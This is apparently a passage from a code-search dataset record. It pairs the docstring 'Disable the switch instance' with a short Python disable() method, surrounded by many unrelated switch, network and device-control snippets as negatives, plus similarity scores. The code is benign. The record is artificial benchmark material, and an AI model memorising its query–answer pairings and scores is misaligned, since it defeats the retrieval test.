DPAE:\n switch.flowtables.add_fe_iig_lldp(dpae_port)\n\n if self.main_policy.identity.dhcp:\n #*** Install FEs to send DHCP Identity indicators to DPAE:\n switch.flowtables.add_fe_iig_dhcp(dpae_port)\n\n if self.main_policy.identity.dns:\n #*** Install FEs to send DNS Identity indicators to DPAE:\n switch.flowtables.add_fe_iig_dns(dpae_port)\n\n if mode == 'active':\n #*** Install AMF entries for MACs we already know dest for:\n mac_list = switch.mactable.dump_macs(context)\n for mac in mac_list:\n self.logger.debug(\"Adding previously learned mac=%s dpid=%s \"\n \"dpae_port=%s to Active Mode Filter (amf)\", mac, dpid,\n dpae_port)\n switch.flowtables.add_fe_amf_macport_dst(dpae_port, mac)\n #*** Install FE to so packets returning from DPAE in active mode\n #*** bypass learning tables and go straight to treatment:\n switch.flowtables.add_fe_iim_dpae_active_bypass(dpae_port)\n\n #*** Add any general TC flows to send to DPAE if required by policy\n #*** (i.e. statistical or payload):\n switch.flowtables.add_fe_tc_dpae(\n self.main_policy.optimised_rules.get_rules(),\n dpae_port, mode)\n\n self.logger.info(\"TC started to DPAE on datapath=%s, dpae_port=%s\",\n dpid, dpae_port)\n _results = {\"status\": \"tc_started\",\n \"mode\": mode}\n return _results", "def cycle(self, include_ethernet=False):\n if not self.healthy:\n self.health_check()\n self.off()\n time.sleep(2) # Small delay before calling power_on\n self.on()", "def start(self):\n\n address = (socket.gethostbyname(self.hostname), self.port)\n logger.info(\"Connecting to %r\" % (address,))\n self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self._socket.connect(address)\n self._start_processors()\n return self", "def enable(self):\n if not self.labExperiment:\n super().enable()\n else:\n self.connection.command('open_dm', self.DMserial)\n status = self.connection.query('get_status')\n assert status == 0, 'Error connecting to DM. Error: ' + str(status)\n numActProfile = self.connection.query('num_actuators')\n assert numActProfile == self.numActProfile, 'Wrong number of profile actuators entered'\n print(\"'BM1k' is now enabled\")", "def start_monitoring(self):\n pass", "def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.start_agents_once = False\n self.start_servers_once = False\n self.setup_start_agents = False\n self.setup_start_servers = False", "def turn_on(self, **kwargs):\n self._state = True\n if(self._device['type'] == '_DT-PLUG' or self._device['type'] == '_THIMR'):\n self._send_cmd(self._device,'cmd=ctrl&devices={[' + self._device[\"sid\"] + ']}&op={\"cmd\":5,\"op\":1 }', 5)\n if(self._device['type'] == '_REALY2' or self._device['type'] == '_REALY4'):\n self._send_cmd(self._device, 'cmd=ctrl&devices={[' + self._device[\"sid\"] + ']}&op={\"cmd\":5,\"'+ self._data_key +'\":1 }', 5)", "def Bg_ping_start(host, options):\r\n BgPing.start_traffic(host, options)", "def begin_sending_packets():\n monitoru = main_monitoring.MainMonitoring()\n monitoru.start_monitor_loop()", "def startBackend():\n global started\n if started:\n return\n started = True\n print(\"Backend started\")", "def start(self):\n for workload in self._workloads:\n self.log.info(\"%-20s STARTING port=%s\" % (workload.name(), workload.port()))\n workload.pre_start()\n workload.start()\n self._monitor_loop()\n self._cleanup()", "def enable(self):\n self._enabled = True", "def enable_network_management(self):\n self._request({\"enable-network-management\": True})", "def turn_on(self, **kwargs: Any) -> None:\n if self.type == \"on_off\":\n _LOGGING.debug(\"Starting all torrents\")\n self._tm_client.api.start_torrents()\n elif self.type == \"turtle_mode\":\n _LOGGING.debug(\"Turning Turtle Mode of Transmission on\")\n self._tm_client.api.set_alt_speed_enabled(True)\n self._tm_client.api.update()", "def connectCPU(self, cpu):\n self.cpu_side = cpu.dcache_port", "async def __aenter__(self) -> \"SwitcherBridge\":\n await self.start()\n return self", "def _starting(self, sender, **kwargs):\n _log.info('Starting: {}'.format(self.__name__))\n self.vip.heartbeat.start()\n # _log.debug(self.vip.ping('', \"PING ROUTER?\").get(timeout=3))\n #\n q = query.Query(self.core)\n # TODO: Use all addresses for fallback, #114\n self._external_addresses = q.query(b'addresses').get(timeout=30)\n assert self._external_addresses\n self._serverkey = q.query(b'serverkey').get(timeout=30)\n\n _log.debug(\"external addresses are: {}\".format(\n self._external_addresses\n ))\n\n # self._local_address = q.query('local_address').get(timeout=30)\n # _log.debug('Local address is? {}'.format(self._local_address))\n _log.info('Registering jsonrpc and /.* routes with {}'.format(\n MASTER_WEB\n ))\n\n self.vip.rpc.call(MASTER_WEB, 'register_agent_route',\n r'^/jsonrpc.*',\n self.core.identity,\n 'jsonrpc').get(timeout=10)\n\n self.vip.rpc.call(MASTER_WEB, 'register_path_route', VOLTTRON_CENTRAL,\n r'^/.*', self._webroot).get(timeout=20)\n\n self.webaddress = self.vip.rpc.call(\n MASTER_WEB, 'get_bind_web_address').get(timeout=30)\n\n # Remove so that dynamic agents don't inherit the identity.\n os.environ.pop('AGENT_VIP_IDENTITY')", "def start(self):\n\t\tself.init_trajectory_gripper()\n\t\tself.gripperserver.start()\n\t\tprint(\"The action server for this driver has been started\")", "def setupHw():\n\n pin.setupHw()\n pin.setupOutPins(traffic_lights)\n pin.setDebug(False)", "def enable(ctx):\n\n config_db = ConfigDBConnector()\n config_db.connect()\n config_db.mod_entry(\"NAT_GLOBAL\", \"Values\", {\"admin_mode\": \"enabled\"})", "def activate():\n refresh()\n activate_connection_with_mainloop(get_uuid())", "def start_processing(self):", "def setup(self):\n self.log.debug('RFSwitch - in RFSwitch setup()')\n # Add resource setup code here\n print(\"Calling RFSwitch:setup\")", "def start_driving(self):\n\n self.stop_driving()\n self.drive_thread = DriveThread()\n self.drive_thread.start()", "def enable(self):", "def start(self):\r\n self.setDriver('ST', 1)", "def start():\n\n start_server()", "def activate_controller(self):\n if self.controller_address:\n #print \"Activating controller...\"\n self.controller = Controller(\n self.controller_address,\n self.proxy_address,\n self.migrating)\n self.controller.switch = self\n else:\n print \"[WARNING] Controller undefined\"", "def start_SLP_server(self):\n import slp\n \n s = self.op.get_value('mode_params')\n if len(s) == 0:\n print 'No parameter received'\n params = {}\n else:\n l_p = self.parse_params(s)\n params = {'action':[np.int(l_p[0])]}\n if len(l_p) == 2:\n params['image_feature_layer_name'] = l_p[1]\n slpserver = slp.SLPServerTrial(self, params)\n slpserver.start()", "def start(self):\n self.thread.start()", "def turn_on(self, **kwargs):\n self.smartplug.turn_on()", "def activate(self):\n if not self._env.enable_registration:\n return\n legacy_key = '{}:{}'.format(self._env.flask_host, self._env.flask_port)\n self._key = self._env.get('my_ident', legacy_key, 'microservice')\n LoopingCall(self.ping).start(5, now=False)", "def init(self):\n try:\n yield self._connect_dbus()\n logger.info(\"Request the GSM resource\")\n yield WaitFSOResource('GSM', time_out=30)\n yield WaitDBus(self.ousage.RequestResource, 'GSM')\n yield self._turn_on()\n logger.info(\"register on the network\")\n register = yield self._register()\n #if register:\n #provider = yield tichy.Wait(self, 'provider-modified')\n \n self._keep_alive().start()\n \n ##network selection end\n \n except Exception, ex:\n logger.error(\"Error : %s\", ex)\n raise\n \n try:\n \n yield tichy.Service.get('ConfigService').wait_initialized()\n self.config_service = tichy.Service.get(\"ConfigService\")\n logger.info(\"got config service\")\n \n except Exception, ex:\n logger.error(\"Error in try retrieving config service : %s\", ex)\n \n try:\n \n ##call forwaring setting start\n self.values = self.config_service.get_items(\"call_forwarding\")\n if self.values != None: self.values = dict(self.values)\n logger.info(\"realized values is none\")\n\n except Exception, ex:\n logger.error(\"Error in try call forwarding setting : %s\", ex)\n \n \n try:\n\n self.SettingReason = tichy.settings.ListSetting('Call Forwarding','Reason',tichy.Text,value='unconditional', setter=self.ForwardingSetReason,options=[\"unconditional\",\"mobile busy\",\"no reply\",\"not reachable\",\"all\",\"allconditional\"],model=tichy.List([ ListSettingObject(\"unconditional\", self.action),ListSettingObject(\"mobile busy\",self.action),ListSettingObject(\"no reply\", self.action),ListSettingObject(\"not reachable\", self.action),ListSettingObject(\"all\", self.action),ListSettingObject(\"all conditional\", self.action)]), ListLabel =[('title','name')])\n \n self.SettingForwarding = tichy.settings.ToggleSetting('Call Forwarding', 'active', tichy.Text, value=self.GetForwardingStatus('unconditional'),setter=self.ToggleForwarding, options=['active','inactive'])\n \n \n except Exception, ex:\n logger.error(\"Error in try call forwarding setting list : %s\", ex)\n \n \n try:\n\n self.SettingChannels = tichy.settings.Setting('Call Forwarding', 'channels', tichy.Text, value=self.ForwardingGet('class'), setter=self.ForwardingSetClass, options=[\"voice\",\"data\",\"voice+data\",\"fax\",\"voice+data+fax\"])\n \n self.SettingTargetNumber = tichy.settings.NumberSetting('Call Forwarding', 'Target Number', tichy.Text, value=self.ForwardingGet('number'), setter=self.ForwardingSetNumber)\n \n self.SettingTargetNumber = tichy.settings.NumberSetting('Call Forwarding', 'Timeout', tichy.Text, value=self.ForwardingGet('timeout'), setter=self.ForwardingSetTimeout)\n \n ##call forwaring setting stop\n \n \n except Exception, ex:\n logger.error(\"Error in try Error in try call forwarding setting : %s\", ex)\n \n try:\n\n ##call identifaction setting start\n self.CallIdentification = tichy.settings.Setting('Network', 'Call Identification', tichy.Text, value=self.GetCallIdentification(), setter=self.SetCallIdentifaction, options=[\"on\",\"off\",\"network\"])\n ##call identifaction setting stop\n \n except Exception, ex:\n logger.error(\"Error in network identification setting: %s\", ex)\n \n try: \n ##network selection etc begin\n self.NetworkRegistration = tichy.settings.Setting('Network', 'Registration', tichy.Text, value=self.GetRegStatus(), setter=self.SetRegStatus, options=[\"registered\",\"not registered\"])\n \n \n except Exception, ex:\n logger.error(\"Error in network registration setting : %s\", ex)\n \n \n try:\n \n self.scanning = False\n self.NetworkList = tichy.List()\n self.ListLabel = [('title','name'),('subtitle','status')]\n \n self.scan_setting = tichy.settings.ListSetting('Network', 'List', tichy.Text, value=\"scan\", setter=self.run_scan, options=['scan'], model=self.NetworkList, ListLabel=self.ListLabel)\n \n except Exception, ex:\n logger.error(\"Error in network list setting : %s\", ex)\n #raise", "def start_traffic(self, context: ResourceCommandContext, blocking: str) -> None:\n self.handler.start_traffic(blocking)", "def activate(self):\n super(Pfsense, self).activate()\n default_identifier = self.config.get('DEFAULT_IDENTIFIER_STR', '')\n if not default_identifier:\n self.log.warn('No default identifier set')\n\n self.default_identifier = self.build_identifier(default_identifier)\n self.thread = threading.Thread(target=log_thread, args=(self,))\n\n self.dns_cache = DNSCache()\n self.dns_cache.start()\n self.running = False", "def enable(self):\n\n self._slo_examples_per_batch.enable()\n self._slo_number_of_epochs.enable()\n self._slo_neural_network.enable()\n self._slo_image_size.enable()\n super().enable()", "def start(self):\n self._setup_thread()\n self.thread.start()", "def start_run(self, context: RobotRunnerContext) -> None:\n rospy.init_node(\"robot_runner\", disable_signals=True)\n self.ina219_profiler = INA219ProfilerClient()\n self.cpu_mem_profiler = ResourceProfilerClient()", "def start( self ):\n\n self.service()", "def setup_gateway(self, args):\n if args.preponly:\n return\n\n # edit the gateway properties file and restart the gateway\n # mdm.ip.addresses = <addresses of node0,node1>\n # security.bypass_certificate_check = true\n _config = '/opt/emc/scaleio/gateway/webapps/ROOT/WEB-INF/classes/gatewayUser.properties'\n _commands = []\n #_commands.append(\"sed -i 's|^mdm.ip.addresses.*|mdm.ip.addresses={},{}|' {}\".format(args.IP[0], args.IP[1], _config))\n #_commands.append(\"sed -i 's|^security.bypass_certificate_check.*|security.bypass_certificate_check=true|' {}\".format( _config))\n _commands.append(\"systemctl restart scaleio-gateway\")\n self.node_execute_multiple(args.IP[2], args.USERNAME, args.PASSWORD, _commands)\n return", "def enable_scp(self) -> None:\n if self.is_active():\n device: ASADevice = self\n else:\n device = self.peer_device\n\n if not device.is_active():\n log.error(\"Host %s: Unable to establish a connection with the active device\", self.host)\n raise FileTransferError\n\n try:\n device.config(\"ssh scopy enable\")\n except CommandError:\n log.error(\"Host %s: Unable to enable scopy on the device\", self.host)\n raise FileTransferError\n\n log.info(\"Host %s: ssh copy enabled.\", self.host)\n device.save()", "def start(self) -> None:\n self.stopping.clear()\n self.thread = threading.Thread(target=self._run, daemon=True, name=self.thread_name)\n self.thread.start()", "def start(self):\n #url = '{}://{}:{}/'.format('http',\n # self.ip,\n # self.port)\n #self.service_info = ServiceInfo(\n # '_webthing._sub._http._tcp.local.',\n # '{}._http._tcp.local.'.format(self.name),\n # address=socket.inet_aton(self.ip),\n # port=self.port,\n # properties={\n # 'url': url,\n # },\n # server='{}.local.'.format(socket.gethostname()))\n #self.zeroconf = Zeroconf()\n #self.zeroconf.register_service(self.service_info)\n\n # If WebSocketS used and NOT running in thread, and WebServer IS\n # running in thread make shure WebServer has enough stack size to\n # handle also the WebSocket requests.\n log.info('Starting Web Server')\n self.server.Start(threaded=srv_run_in_thread, stackSize=8192)", "def tcp_start(self, flow: mitmproxy.tcp.TCPFlow):", "def _on_start_cycle(self, kwargs: dict) -> None:\n self._on_toggle_and_run({\"state\": \"on\"})", "def start_execution(self):\n self.send_message(\"control.start\",None)", "def start(self):\n if self.is_alive:\n self.logger.warning('Already started!')\n return\n self._create_tunnels()\n if not self.is_active:\n self._raise(BaseSSHTunnelForwarderError,\n reason='Could not establish session to SSH gateway')\n for _srv in self._server_list:\n thread = threading.Thread(\n target=self._serve_forever_wrapper,\n args=(_srv, ),\n name='Srv-{0}'.format(address_to_str(_srv.local_port))\n )\n thread.daemon = self.daemon_forward_servers\n thread.start()\n self._check_tunnel(_srv)\n self.is_alive = any(self.tunnel_is_up.values())\n if not self.is_alive:\n self._raise(HandlerSSHTunnelForwarderError,\n 'An error occurred while opening tunnels.')", "def enable_service(service_name, start_type='auto'):\n run_program(['sc', 'config', service_name, 'start=', start_type])", "def run(self):\n self.network_ctrl.connect_with_remote_system()\n cmd = self.create_command(self.on_or_off, self.port)\n self.network_ctrl.send_command(cmd)\n\n check = self._port_status(self.port)\n result = self.network_ctrl.send_command(check)\n result = result[0]\n if self.on_or_off:\n if result == \"1\":\n self.router.mode = Mode.normal\n logging.info(\"[+] Successfully switched on port \" + str(self.port))\n else:\n self.router.mode = Mode.unknown\n logging.info(\"[-] Error switching on port \" + str(self.port))\n else:\n if result == \"0\":\n self.router.mode = Mode.off\n logging.info(\"[+] Successfully switched off port \" + str(self.port))\n else:\n self.router.mode = Mode.unknown\n logging.info(\"[-] Error switching off port \" + str(self.port))\n\n self.network_ctrl.exit()", "def startSpawing(self):\n self.girderManager.startSpawing()", "def prepare_monitor_before(self):\n\t\tself.prepare_sysctl()\n\t\tself.clean_kernel_log()\n\t\tself.start_tcpdump()\n\t\tif self.cfg.enable_inetsim:\n\t\t\tself.start_network_nat()\n\t\t\tself.start_inetsim()", "async def enable(self, **kwargs) -> None: # pylint: disable=unused-argument\r\n await self.set_ena(True)", "def start(self, _):\n logger.debug(\"Spawning metric & span reporting threads\")\n self.should_threads_shutdown.clear()\n self.sensor.start()\n instana.singletons.tracer.recorder.start()" ]
[ "0.633651", "0.63337624", "0.627072", "0.62615603", "0.6093382", "0.6046594", "0.595381", "0.5936305", "0.58609205", "0.58298725", "0.5779756", "0.57681865", "0.5766365", "0.5766356", "0.5763502", "0.57629", "0.57612556", "0.5747415", "0.5741657", "0.57210463", "0.5721009", "0.5691176", "0.56485105", "0.5615015", "0.5595959", "0.5588712", "0.55703497", "0.5539881", "0.55389404", "0.5538847", "0.5523063", "0.5521473", "0.55048585", "0.55048585", "0.5504399", "0.5502472", "0.5484939", "0.5480258", "0.5480209", "0.54790616", "0.5477981", "0.5471683", "0.54678005", "0.54673564", "0.54611987", "0.54508555", "0.5446314", "0.54429257", "0.54423994", "0.54404306", "0.5430337", "0.54303086", "0.54254884", "0.54253703", "0.5416758", "0.54113513", "0.540692", "0.5405405", "0.5403963", "0.5396331", "0.5396149", "0.53898567", "0.5386838", "0.538426", "0.53817093", "0.5381634", "0.5376393", "0.53754157", "0.53691596", "0.53662217", "0.53610945", "0.5354829", "0.5353068", "0.53528726", "0.5345553", "0.5342972", "0.53407556", "0.5338358", "0.53383064", "0.5331773", "0.5330794", "0.5324194", "0.5322941", "0.5321635", "0.5321385", "0.53211427", "0.53145576", "0.5307298", "0.53046614", "0.5301705", "0.5299074", "0.5296493", "0.5290057", "0.52839404", "0.52787715", "0.5277756", "0.5271273", "0.52711415", "0.5268121", "0.526721" ]
0.7502978
0
Disable the switch instance Packets on ingress are discarded while the switch is disabled. Traffic manager threads are not stopped.
def disable(self): logging.debug("Disabling switch %s" % self.name) self.disabled = True
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "async def async_turn_off(self):\n path = \"/ip/firewall/nat\"\n param = \".id\"\n value = None\n for uid in self._ctrl.data[\"nat\"]:\n if (\n self._ctrl.data[\"nat\"][uid][\"name\"]\n == f\"{self._data['protocol']}:{self._data['dst-port']}\"\n ):\n value = self._ctrl.data[\"nat\"][uid][\".id\"]\n\n mod_param = \"disabled\"\n mod_value = True\n self._ctrl.set_value(path, param, value, mod_param, mod_value)\n await self._ctrl.async_update()", "def disable(self):\n self._disable_monitor()\n self._pinger.stop()", "def disable_switch_port(self, mgr, interface):\n confstr = snipp.CMD_NO_SWITCHPORT % (interface)\n confstr = self.create_xml_snippet(confstr)\n LOG.debug(\"NexusDriver: %s\" % confstr)\n mgr.edit_config(target='running', config=confstr)", "def on_disable(self) -> None:\n self._on_stop_cycle({})", "def disable(self):\n\n super().disable()\n self._slo_image_size.disable()\n self._slo_neural_network.disable()\n self._slo_number_of_epochs.disable()\n self._slo_examples_per_batch.disable()", "def _disable(self):\n self.enabled = False", "def turn_off(self):\n self._state = False\n if(self._device['type'] == '_DT-PLUG' or self._device['type'] == '_THIMR'):\n self._send_cmd(self._device, 'cmd=ctrl&devices={[' + self._device[\"sid\"] + ']}&op={\"cmd\":5,\"op\":0 }', 5)\n if(self._device['type'] == '_REALY2' or self._device['type'] == '_REALY4'): \n self._send_cmd(self._device, 'cmd=ctrl&devices={[' + self._device[\"sid\"] + ']}&op={\"cmd\":5,\"'+ self._data_key +'\":0 }', 5)", "def switch_off_traffic_lights(self):\n for actor in self.world.get_actors():\n if actor.type_id == 'traffic.traffic_light':\n actor.freeze(True)\n # We set the traffic light to 'green' because 'off' state sets the traffic light to\n # 'red'.\n actor.set_state(carla.TrafficLightState.Green)", "def off_switch(self):\n self._switch_callback = None", "def switch_off(self):\n if threading.current_thread() != self._blinking_thread:\n self._blinking_thread.unregister(self)\n GPIO.output(self.pin, GPIO.LOW)", "def stop_traffic(self):\n self._logger.debug(\"stop_traffic()\")", "def set_disabled_switch(self, disabled):\n self.disabled = disabled", "def disable_output(self):\n\n self.__rtcconfig = self.__helper.updatebyte(self.__rtcconfig, 7, 0)\n self.__rtcconfig = self.__helper.updatebyte(self.__rtcconfig, 4, 0)\n self.__bus.write_byte_data(\n self.__rtcaddress, self.CONTROL, self.__rtcconfig)\n return", "def disable(self):\n self.error_code = 'DISABLED'\n self.running = False", "def disable():\n configdb = ConfigDBConnector()\n configdb.connect()\n tunnel_info = {}\n tunnel_info['FLEX_COUNTER_STATUS'] = DISABLE\n configdb.mod_entry(\"FLEX_COUNTER_TABLE\", \"TUNNEL\", tunnel_info)", "def disable(ctx):\n config_db = ConfigDBConnector()\n config_db.connect()\n config_db.mod_entry(\"NAT_GLOBAL\", \"Values\", {\"admin_mode\": \"disabled\"})", "def disable(self):\n self.enabled = False", "def disable(self):\n self._enabled = False", "async def async_set_wifi_led_off(self):\n return", "def firewallOff():\n pass", "def Bg_ping_stop():\r\n BgPing.stop_traffic()", "def stop_traffic(self):\n raise NotImplementedError(\n \"The TrafficController does not implement\",\n \"the \\\"stop_traffic\\\" function.\")", "def ethernet_off(self):\n if not self.healthy:\n self.health_check()\n if not self._ethernet_switch:\n raise errors.CapabilityNotReadyError(\n device_name=self._device_name,\n msg=\"Not set up for ethernet switching.\")\n self._ethernet_switch.switch_power.power_off(self.ethernet_port_number)", "def turn_off(self, **kwargs: Any) -> None:\n if (\n DPCODE_LIGHT in self.tuya_device.status\n and DPCODE_SWITCH not in self.tuya_device.status\n ):\n commands = [{\"code\": DPCODE_LIGHT, \"value\": False}]\n else:\n commands = [{\"code\": DPCODE_SWITCH, \"value\": False}]\n self._send_command(commands)", "def disable_relays(self):\n #ensure clock low and data high\n self.e.clear_bit(7)\n self.e.set_bit(5)\n time.sleep(0.01)\n\n #pulse the clock line\n self.e.set_bit(7)\n time.sleep(0.01)\n self.e.clear_bit(7)\n\n #clear the data line\n self.e.clear_bit(5)", "def disable(self):", "def disable():\n request = dict(id='gbn')\n _gbn_disable(request)", "def disable(self) -> None:", "def turn_off(self, **kwargs) -> None:\n self.wink.set_state(False)", "def _disable(self):\n self.debug_log(\"Disabling...\")\n self._unregister_handlers()", "def scp_disable(task):\n cmd = \"no ip scp server enable\"\n task.run(task=netmiko_send_config, config_commands=cmd)\n task.run(task=netmiko_save_config)\n c_print(f\"*** {task.host}: SCP has been disabled ***\")", "def _disable_wifi_ap(self):\n call(['systemctl', 'disable', 'hostapd', ])\n call(['systemctl', 'disable', 'dnsmasq', ])\n\n context = self._get_ap_context()\n self._write_system_template('/etc/network/interfaces', 'interfaces.conf', context)\n self._write_system_template('/etc/dhcpcd.conf', 'dhcpcd.conf', context)", "def disable(self):\n pass", "def on_disable(self) -> None:\n self._cancel_notification_cycle()", "def _led_disable():\n # type: () -> None\n GPIO.output(LED_nOE, GPIO.HIGH)", "def disable_server(self, server):\n log.info(\"Disabling %s in netscaler\", server)\n return self.post(\"server?action=disable\", {\"server\": {\"name\": server}}, content_type=self.content_type(\"server\"))", "def unpause(self, instance):\n self.power_on(\n context=None,\n instance=instance,\n network_info=None,\n block_device_info=None)", "def switch_off(self):\n raise DeviceException(DeviceException.FEATURE_NOT_IMPLEMENTED)", "def clean_rebind_test(**kwargs):\n if 'verify_traffic' not in kwargs:\n kwargs['verify_traffic'] = False\n prepare_subscriber_traffic(**kwargs)\n device_id = kwargs.get('device_id', bbe.get_devices(device_tags='dut', id_only=True)[0])\n switch_id = kwargs.get('switch_id', 'r1')\n switch_handle = t.get_handle(switch_id)\n switch_access_intf = bbe.get_interfaces(switch_id, interfaces='access')\n status = True\n for iteration in range(1, int(kwargs.get('iteration', 1)) + 1):\n t.log(\"disable access ports in switch in iteration #{}\".format(iteration))\n port_command_list = []\n status = True\n for access in switch_access_intf:\n port_command_list.append(\"set interfaces {} disable\".format(access.interface_pic))\n switch_handle.config(command_list=port_command_list)\n switch_handle.commit()\n t.log(\"verify access ports in down state\")\n for access in switch_access_intf:\n resp = switch_handle.pyez('get_interface_information', level_extra='terse',\n interface_name=access.interface_pic).resp\n if resp.findtext('physical-interface/admin-status') == 'down' and resp.findtext(\n 'physical-interface/oper-status') == 'down':\n t.log(\"interface {} is in down state\".format(access.interface_pic))\n else:\n t.log('WARN', \"interface {} is in state {}\".format(access.interface_pic, resp))\n status = False\n\n if not status:\n for access in switch_access_intf:\n port_command_list.append(\"delete interfaces {} disable\".format(access.interface_pic))\n switch_handle.config(command_list=port_command_list)\n switch_handle.commit()\n raise Exception(\"some interfaces failed to be in down state after disable\")\n base_time = time.time()\n while time.time() - base_time < 1800:\n router_count = get_router_sub_summary(device_id)['client']\n tester_count = get_rt_subs_info()['rt_sessions_up']\n if router_count == 0 and tester_count == 0:\n duration = time.time() - base_time\n t.log(\"all subscribers cleared from tester and router after {}s in iteration #{}\".format(duration,\n iteration))\n break\n t.log(\"sleep 30s , waiting for clients cleared\")\n time.sleep(30)\n\n result = get_router_sub_summary(device_id)\n\n if result['client'] != 0 or 'terminated' in result or 'terminating' in result or 'init' in result:\n status = False\n t.log('WARN', 'some subscribers stuck in unexpected state in iteration #{}'.format(iteration))\n\n for access in switch_access_intf:\n port_command_list.append(\"delete interfaces {} disable\".format(access.interface_pic))\n switch_handle.config(command_list=port_command_list)\n switch_handle.commit()\n time.sleep(10)\n t.log(\"verify access ports in up state in iteration {}\".format(iteration))\n for access in switch_access_intf:\n resp = switch_handle.pyez('get_interface_information', level_extra='terse',\n interface_name=access.interface_pic).resp\n if resp.findtext('physical-interface/admin-status') == 'up' and resp.findtext(\n 'physical-interface/oper-status') == 'up':\n t.log(\"interface {} is in up state\".format(access.interface_pic))\n else:\n t.log('WARN', \"interface {} is in state {}\".format(access.interface_pic, resp))\n status = False\n\n if not status:\n raise Exception(\"clean test failed\")\n ##set the rt subscriber state to stopped, since it is not teared down by actions\n t.log(\"login subscriber and verify traffic after restore the connection in iteration #{}\".format(iteration))\n prepare_subscriber_traffic(**kwargs)", "def wifi_off(self):\n self._clear_read_buffer()\n self._write_cmd(\"PE00\")\n time.sleep(100e-3)", "def turn_off(self):\n print(\"Turning the lights off\")\n self.led.all_off()\n self.client.publish(STATE_TOPIC, OFF) #publish", "def stop_traffic(self, context: ResourceCommandContext) -> None:\n self.handler.stop_traffic()", "def turn_off(self, **kwargs):\n setattr(self.resource, self.variable, False)", "def disable(ctx):\n fc_info = {}\n fc_info['FLEX_COUNTER_STATUS'] = 'disable'\n ctx.obj.mod_entry(\"FLEX_COUNTER_TABLE\", \"FLOW_CNT_ROUTE\", fc_info)", "def pswitchoff(chan) :\n s.phaseSwitching(False, chan)", "async def async_turn_off(self):\n path = \"/interface\"\n param = \"default-name\"\n if \"-\" in self._data[\"port-mac-address\"]:\n param = \"name\"\n value = self._data[param]\n mod_param = \"disabled\"\n mod_value = True\n self._ctrl.set_value(path, param, value, mod_param, mod_value)\n\n if self._data[\"poe-out\"] == \"auto-on\":\n path = \"/interface/ethernet\"\n self._ctrl.set_value(path, param, value, \"poe-out\", \"off\")\n\n await self._ctrl.async_update()", "def disabled(config):\n disable(config)\n reload_service('apache2')", "def get_disabled_switch(self):\n return self.disabled", "async def disable_paging(self):\n\n # Display info message\n log.info(\"disable_paging\")\n\n # Send command to the device to disable paging\n await self.send_command(self.cmd_disable_paging)", "def turn_off(self):\n if self._module_type == NA_VALVE:\n self._data.homestatus.setroomThermpoint(\n self._data.home_id,\n self._room_id,\n STATE_NETATMO_MANUAL,\n DEFAULT_MIN_TEMP,\n )\n elif self.hvac_mode != HVAC_MODE_OFF:\n self._data.homestatus.setroomThermpoint(\n self._data.home_id, self._room_id, STATE_NETATMO_OFF\n )\n self.update_without_throttle = True\n self.schedule_update_ha_state()", "def allOff():\n # Get/set special slice IDs\n root_xid = bwlimit.get_xid(\"root\")\n default_xid = bwlimit.get_xid(\"default\")\n kernelhtbs = gethtbs(root_xid, default_xid)\n if len(kernelhtbs):\n logger.log(\"bwmon: Disabling all running HTBs.\")\n for htb in kernelhtbs.keys(): bwlimit.off(htb, dev = dev_default)", "def stop(self):\n # remove all tap interfaces\n for i in range(self._vport_id):\n tapx = 'tap' + str(i)\n tap_cmd_list = ['sudo', 'ip', 'tuntap', 'del', tapx, 'mode', 'tap']\n # let's assume, that all VMs have NIC QUEUES enabled or disabled\n # at the same time\n if int(settings.getValue('GUEST_NIC_QUEUES')[0]):\n tap_cmd_list += ['multi_queue']\n tasks.run_task(tap_cmd_list, self._logger, 'Deleting ' + tapx, False)\n self._vport_id = 0\n\n # remove datapath before vswitch shutdown\n dpctl = DPCtl()\n dpctl.del_dp()\n\n super(OvsVanilla, self).stop()\n\n # give vswitch time to terminate before modules are removed\n time.sleep(5)\n self._module_manager.remove_modules()", "async def disable(self, ctx):\n\n server = ctx.message.server\n\n settings = self.bot.dota_ticker_settings.get(server.id)\n\n if settings is not None:\n settings['enabled'] = False\n await self.bot.dota_ticker_settings.put(server.id, settings)\n\n await self.bot.say('The match ticker has been disabled on {0.name}.'.format(server))", "def deactivate():\n deactivate_connection_with_mainloop(get_uuid())", "def _doDisableRegulation(self):\n self._cmdRegulOff()", "def turn_off(self, **kwargs):\n request = requests.post(self._resource, data=\"0\", timeout=10)\n if (request.status_code == 200) or (request.status_code == 201):\n self._state = False\n else:\n _LOGGER.error(\"Can't turn off %s. Is resource/endpoint offline?\",\n self._resource)\n\n self.schedule_update_ha_state()", "def __disable__(self) -> None:\n pass", "async def unlight(self) -> None:\n self.lit = False\n await self.run_command(\"miner fault_light off\")\n print(\"unlight\" + self.ip)", "def Disable(self):\n handler = self.get_command_object(\"Disable\")\n handler()", "def disable(self):\n self.enabled = False\n self.__store(self)", "def disable(self) -> Awaitable[Dict]:\n return self.client.send(\"Security.disable\", {})", "async def disable_protection(self) -> None:\n await self._request(\n \"dns_config\", method=\"POST\", json_data={\"protection_enabled\": False},\n )", "async def disable(self, **kwargs) -> None: # pylint: disable=unused-argument\r\n await self.set_ena(False)", "def disable_emission(self):\n self.ask(\"LASER=OFF\")\n self.ask(\"LASER=ON\") # unlocks emission button, does NOT start emission!", "def turn_off(self, **kwargs):\n self.smartplug.turn_off()", "def tethering_disabled(self, tethering_disabled):\n\n self._tethering_disabled = tethering_disabled", "def turn_off(self, **kwargs: Any) -> None:\n self._device.power_on = False\n _LOGGER.debug(\"Turn off light %s\", self._device.ip)", "def disabletrafficitem(trafficItemName):\n middleware.trafficObj.disableTrafficItemByName(trafficItemName)", "def disable(self):\n self.registrar.unregister_service(\"map\", namespace=__name__)\n self.registrar.unregister_service(\"directions\", namespace=__name__)", "def disable(self):\n if not self.labExperiment:\n super().disable()\n else:\n self.zero()\n self.connection.query('close_dm')\n print(\"'BM1k' is now disbaled\")", "def turn_off(self, **kwargs):\n self._is_on = False", "def disable(self):\n raise NotImplementedError", "def turn_off(self, **kwargs):\n set_sonoff_state(self._host, \"off\")\n self._state = False", "def turn_off(self):\n self._interrupt_flash()\n if self.on:\n GPIO.output(self.pin, GPIO.LOW)\n self.on = False", "def disable(self, subsystem=False):\n self.__dict__[\"enabled\"] = False\n\n if subsystem:\n self.subsystem.disable()", "def stop_advertising(self):\n self._periph.stop_advertising()", "def _remove_from_switch(self, _switch, context):\n _network = context.current['id']\n _vlanid = context.current['provider:segmentation_id']\n\n # BRIDGE_PORT_URL = 